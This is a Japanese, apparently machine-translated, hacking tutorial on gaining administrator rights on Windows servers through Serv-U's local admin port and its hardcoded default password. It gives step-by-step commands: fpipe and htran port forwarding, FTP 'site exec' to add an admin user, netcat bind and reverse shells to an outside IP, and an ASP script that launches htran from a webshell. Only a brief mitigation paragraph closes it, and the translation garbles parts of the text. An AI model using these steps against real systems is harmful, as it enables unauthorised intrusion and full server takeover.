最高の権限

Serv-Uデフォルト監視127.0.0.1:43958を取得するためにWebshel​​lとServ-uを組み合わせると、このマシンでこの管理ポートに接続でき、Serv-Uデフォルト管理アカウントはlocalAdministrator、デフォルトパスワードは "＃l @ $ ak＃です。 .lk; 0 @ P "、このパスワードは固定です。ターゲットマシン上でfpipe -v -l 12345 -r 43958 127.0.0.1を実行してから、自分のマシン上に "Serv-U administrator"を指定して新しいSERVERを作成します。ターゲットIP：12345ユーザー：LocalAdministratorパス： "#l@$ak#.lk; 0 @ P" 0その後、ターゲットマシンのServ-Uはあなた次第です。使用の前提：ターゲットマシンの通常の権限を持つシェルは、シェルがある限り、端末または物理コンソールにログインできる必要はありません、ポートデータ転送を実行することができるプログラムは、shellを取得することができます。具体的な実装方法

1.入手したWebシェルアップロードを使用してプログラムfpipeを転送し、次にfpipe -v -l 12345 -r 43958 127.0.0.1を実行します。マシン、「SER-U管理者」を使用して新しいサーバーを作成し、ip：ターゲットIPポート：12345を入力します。ユーザー：LocalAdministratorパス： "#l@$ak#.lk; 0 @ P"これで、このサーバーを管理できますServ-U、新しいアカウント、システム管理者（システム管理者）を作成し、 "ディレクトリアクセス"オプションで "実行"許可（execute）を与える3. ftp接続してから実行する

 quote site execネットユーザーiisuser password /add iisuser passwordという名前のユーザーをパスワードに追加し、それを管理者グループquota site execネットローカルグループ管理者iisuser /addに追加して、今すぐ接続できます端末を手にしてログインします。もちろん、nc.exeをアップロードしたり、ターゲットマシン上で管理者権限を持つシェルを取得するなど、他の操作（順方向または逆方向）を実行することもできます。順方向接続：ftpに接続して
見積サイト実行を実行します。exec nc.exe -l -p 23 -t -e cmd.exeこの時点で、ターゲットホストはtelnetサーバーになり、ターゲットサーバーにtelnetできます。ポート逆接続：あなたのIPが202.96.209.168であると仮定します1.あなた自身のマシン上でそれを実行します（あなたは外部IPを持っていなければなりません）：nc -vv -lp 99 2.ターゲットマシン上でnc -e cmdを実行します。 Exe 202.96.209.168 99あなたのマシン上であなたはターゲットマシン上で管理者権限を持つシェルを手に入れるでしょう相手がポートフィルタリングを持っているかファイアウォール保護を設定しているなら（この保護はバウンス接続を制限しません、制限されるなら変更されます）他の方法は、TCPソケット転送を使用して実装できます。たとえば、私のマシンはA、テストしたいマシンはBです[フロント接続を許可しない]; B上にSHELLを持っています[ゲストがいる限り]。 I：ローカルポート23でリッスンしています。56がBの接続を待機しています; 56が接続を待機していますII：Bがモニター23に接続されていてローカルに転送されています43958はこのように作られていますが、相手のファイヤーウォールは私たちには無用でしょうかこの時点で、Serv-Uをローカルに実行して新しいSERVERを作成し、IPアドレスを56ユーザのlocal 127.0.0.1ポートに入力します。localAdministrator、パスワード#l@$ak#.lk; 0 @ P。 具体的な実装方法
あなたのIPが202.96.209.168であると仮定する1.あなた自身のマシン上でhtran.exe -listen 23 56を実行する; 2. Serv-Uをローカルに実行して新しいSERVERを作成する、IPフィルローカルの127.0.0.1ポートは56、ユーザー名はLocalAdministrator、パスワードは#l@$ak#.lk; 0 @ Pです。ターゲットマシンでhtran.exeを実行します。-slave 127.0.0.1 43958 202.96.209.168 23 Webシェルで直接実行できない場合は、次のように実行するaspスクリプトを記述できます。
 connect.asp<％Set oScript = Server。 CreateObject（ "WSCRIPT.SHELL"）oScript.Run（server.mappath（ "htran"）& "-slave 127.0.0.1 43958 202.96.209.168 23"）％> http：//destination URL /connect.aspを実行してください。空白になってもエラーは表示されず、ターゲットサーバのServ-Uを管理できるようになります。残りはフリープレイに依存します。 Htran.exeは、Red Allianceの Preventing Method 
からダウンロードしてServ-Uにパッチを適用し、デフォルトのポートを変更してパスワードを管理することができるマルチスレッドパッケージ転送ツールです。 2つのファイルServUAdmin.exeとServUDaemon.exeを変更し、ServUDaemon.iniファイルの[GLOBAL]オプションにLocalSetupPortNo = 12345を追加する限りポートを変更しますが、残念ながらServ-U Serv-U 5.2.0.0の最新版はまだ利用可能です。変更はありません。デフォルトの管理ポートとパスワードは元のままです。